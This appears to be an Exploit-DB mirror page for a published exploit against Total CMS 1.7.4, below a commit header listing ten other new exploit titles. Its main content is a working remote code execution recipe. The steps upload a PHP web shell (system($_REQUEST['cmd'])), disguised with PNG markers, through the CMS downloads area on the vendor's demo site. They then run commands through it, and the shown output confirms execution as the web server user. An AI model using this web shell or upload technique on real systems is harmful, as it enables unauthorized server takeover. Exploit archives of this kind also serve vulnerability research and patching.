exploit-db-mirror/exploits/php/webapps/51500.txt
Exploit-DB 25f2c0adca DB: 2023-06-05
8 changes to exploits/shellcodes/ghdb

STARFACE 7.3.0.10 - Authentication with Password Hash Possible

Barebones CMS v2.0.2 - Stored Cross-Site Scripting (XSS) (Authenticated)

Best POS Management System v1.0 - Unauthenticated Remote Code Execution

Enrollment System Project v1.0 - SQL Injection Authentication Bypass (SQLI)

Faculty Evaluation System 1.0 - Unauthenticated File Upload

File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)

MotoCMS Version 3.4.3 - SQL Injection

Online Security Guards Hiring System 1.0 - Reflected XSS

Total CMS 1.7.4 - Remote Code Execution (RCE)

Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)
2023-06-05 00:16:22 +00:00

27 lines
No EOL
617 B
Text

# Exploit Title: Total CMS 1.7.4 - Remote Code Execution (RCE)
# Date: 02/06/2023
# Exploit Author: tmrswrr
# Version: 1.7.4
# Vendor home page : https://www.totalcms.co/
1) Go to this page and click edit page button
https://www.totalcms.co/demo/soccer/
2)After go down and will you see downloads area
3)Add in this area shell.php file
?PNG
...
<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?>
IEND
4) After open this file and write commands
https://www.totalcms.co/cms-data/depot/cmssoccerdepot/shell.php?cmd=id
Result :
?PNG ...
uid=996(caddy) gid=998(caddy) groups=998(caddy),33(www-data)
IEND